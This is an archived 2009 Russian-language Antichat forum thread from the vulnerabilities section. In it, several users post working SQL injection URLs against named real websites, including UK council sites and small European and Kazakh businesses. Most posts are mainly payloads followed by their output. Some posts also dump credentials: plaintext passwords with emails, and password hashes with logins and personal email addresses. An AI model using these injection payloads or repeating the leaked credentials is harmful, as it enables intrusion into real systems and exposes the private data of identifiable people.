ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #9601  
Старый 01.06.2009, 00:22
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию

http://www.paladin.it/eng/news_detail.php?id=398/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9/**/LIMIT/**/1,1/*

Database Version: 5.0.32-Debian_7etch8-log
Database name: paladin
User name: giullo@lh7830-1.intermedia.net

http://www.gemels.it/news_detail.php?id=-11+union+select+1,2,3,4

Database Version: 5.0.32-Debian_7etch10
Database name: gemels_001
User name: dbadmin@localhost

Getting Data from table users from database gemels_001
Fields id:email:usernameassword

[1]:1:demo@demo.it:demo:demo
[2]:2:marco@gemels.it:marco:niko11
[3]:4:mfacchinetti.bg@alice.it:marco11:niko11
 
Ответить с цитированием

  #9602  
Старый 01.06.2009, 10:02
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

сайт моей шараги

это слепая))))

http://www.bek-ufa.ru/modules/abiturient/index.php?sub&id=9+and+substring(version(),1,1)=4/*

а это не слепая)))

http://www.bek-ufa.ru/modules/abiturient/index.php?sub&id=-9+union+select+unhex(hex(version())),2/*

4.1.5-gamma'-Max'

http://www.bek-ufa.ru/modules/abiturient/index.php?sub&id=-9+union+select+unhex(hex(file_priv)),2+from+mysql. user/*

Y

Но кавычки слешируются


####################################
http://www.icqn.ru/modules.php?name=Pages&pa=list_pag&cid=-10+union+select+1,@@version,3--

4.1.22-standard

Последний раз редактировалось HAXTA4OK; 01.06.2009 в 10:30..
 
Ответить с цитированием

  #9603  
Старый 01.06.2009, 12:21
bons
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
Провел на форуме:
1777055

Репутация: 347
По умолчанию

Цитата:
Сообщение от mailbrush  
Нету тут инъекции.
Код:
http://www.multikov.net/master.php?article=-1'+union+select+1,concat(version(),':',database(),':',user()),3,4,5--%200
 
Ответить с цитированием

  #9604  
Старый 01.06.2009, 12:36
Krist_ALL
Banned
Регистрация: 14.01.2009
Сообщений: 515
Провел на форуме:
1996429

Репутация: 468


Отправить сообщение для Krist_ALL с помощью ICQ
По умолчанию

Цитата:
http://www.salt.tg/voyage/index.php?table=guidevoyage&id=-4+union+select+1,2,unhex(hex(version())),4,5,6+
pr 5

Version() - 4.1.22-standard
database() - aeroport_salt
User() - aeroport@localhost

есть таблца users -поля не подобрал...
 
Ответить с цитированием

  #9605  
Старый 01.06.2009, 17:48
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

http://nvector.ru/novost.php?id=-70+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8

5.0.75-percona-highperf-b11-log:a12807_nv@94.103.90.180:a12807_nv
 
Ответить с цитированием

  #9606  
Старый 01.06.2009, 18:00
Kimliksiz
Познающий
Регистрация: 07.05.2009
Сообщений: 31
Провел на форуме:
137000

Репутация: 96
По умолчанию

SQL

http://www.rossendale.gov.uk/site/scripts/recruit_details.php?id=%20null+union+select+1,2,3, 4,concat_ws(0x3a,version(),user(),database()),6,7, 8,9,10

http://www.hyndburnbc.gov.uk/site/scripts/recruit_details.php?id=null+union+select+1,2,3,4,c oncat(username,0x3a,password),6,7,8,9,10,11,12+fro m+J

http://www.wellingborough.gov.uk/site/scripts/recruit_details.php?id=null+union+select+1,2,3,4,c oncat(username,0x3a,password),6,7,8,9,10,11,12+fro m+J
 
Ответить с цитированием

  #9607  
Старый 01.06.2009, 18:05
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

http://danibeba.com/novost.php?id=-29+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,6,7,8,9,10/*

5.0.26-log:stilinte@localhost:stilinte

http://danibeba.com/novost.php?id=-29+union+select+1,2,3,unhex(hex(username)),5,6,unh ex(hex(password)),8,9,10+from+admin+limit+1,1/*

stilinte
*7BA1F2EDCF65942796215A171E26C3806F456350

http://danibeba.com/novost.php?id=-29+union+select+1,2,3,unhex(hex(username)),5,6,unh ex(hex(password)),8,9,10+from+admin+limit+0,1/*

jazz
*120F748F8B68B55C556F18BBF7F0A413706703B3

----------
http://www.parkingsabac.com/strane/novost.php?id=8+and+substring(version(),1,1)=3/*
 
Ответить с цитированием

  #9608  
Старый 01.06.2009, 21:02
Kimliksiz
Познающий
Регистрация: 07.05.2009
Сообщений: 31
Провел на форуме:
137000

Репутация: 96
По умолчанию

http://www.spos.info/novost.php?id=-29+union+select+1,2,3,unhex(hex(username)),5,6,unh %20ex(hex(password)),8,9,10+from+admin+limit+0,1/*

1
Notice: Undefined offset: 1 in /home/sposinfo/public_html/novost.php on line 34

Notice: Undefined variable: mesec in /home/sposinfo/public_html/novost.php on line 83

Notice: Undefined offset: 2 in /home/sposinfo/public_html/novost.php on line 83
postavljeno

http://www.jadraninvest.hr/novost.php?id=-29+union+select+1,2,3,unhex(hex(username)),5,6,unh %20ex(hex(password)),8,9,10+from+admin+limit+0,1/*

http://www.ilindenscout.org.mk/novost.php?id=-29+union+select+1,2,3,unhex(hex(username)),5,6,unh %20ex(hex(password)),8,9,10+from+admin+limit+0,1/*
 
Ответить с цитированием

  #9609  
Старый 01.06.2009, 22:14
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

http://www.ilindenscout.org.mk/novost.php?id=-4+union+select+1,2,3,4,5,concat_ws(0x3a,version(), user(),database()),7

,8,9,10,11,12
5.0.45-log:ilinden@cgi1401.int.bizland.net:ilindenscout
----------
http://www.fototeh.hr/novost.php?nid=31+and+substring(version(),1,1)=5
----------
http://www.pk-primorje.hr/novost.php?id=55+union+select+1,version(),3,4,5,6
5.0.67-community
----------
http://www.roltek.at/novost.php?id=46+union+select+1,version(),3,4,5,6, 7,8,9,10,11
5.0.67-community
----------
http://www.alea.hr/novost.php?id=5+union+select+1,version(),3,4,5,6
4.1.22-standard
----------
http://www.naj-novilist.com/novost.php?id=-147+union+select+1,2,3,4,concat_ws(0x3a,version(), user(),database()),6,7,

8,9,10,11,12,13,14,15,16,17,18,19,20
5.0.67-community:najnovi_najnovi@localhost:najnovi_snl
---------
http://www.ipb-ild.ac.yu/novost.php?cid=1091+and+substring(version(),1,1)=3
----------
http://www.tetrada.rs/novost.php?id=79+union+select+1,version(),3,4,5,6, 7,8,9,10,11
5.0.51a-log
----------
http://galaxy.hr/novost.php?id=-1037+union+select+1,2,concat_ws(0x3a,version(),use r(),database()),4,5,6,7,8,9,10
4.1.22-standard:galaxy_admin@localhost:galaxy_cms
 
Ответить с цитированием

  #9610  
Старый 02.06.2009, 00:17
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

http://skylog.kz/content.php?id=-26'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,concat_w s(0x3a,version(),user(),database()),30,31,32,33+--+

5.0.77:skylog_kz@localhost:base_skylog

http://skylog.kz/content.php?id=-26'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,group_co ncat(concat_Ws(0x3a,password,login,email)),30,31,3 2,33+from+users+--+

Цитата:
3e3345679301b59c022fe36aba40d35d:netwarez:kz4hack@ mail.ru,3e3345679301b59c022fe36aba40d35d:synapse:k z4hack@mail.ru,ccb0989662211f61edae2e26d58ea92f:ka ckad:admin@kackad.kz,b437487a3b8c2074086b378c56e33 497:gorillamillions:crazy_drummer@mail.ru,a603191d 48a1ca77bca3b491b43b2e5d:luckylucky:chukaev_i_v@ma il.ru,ccb0989662211f61edae2e26d58ea92f:st
через лимит смареть всех
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ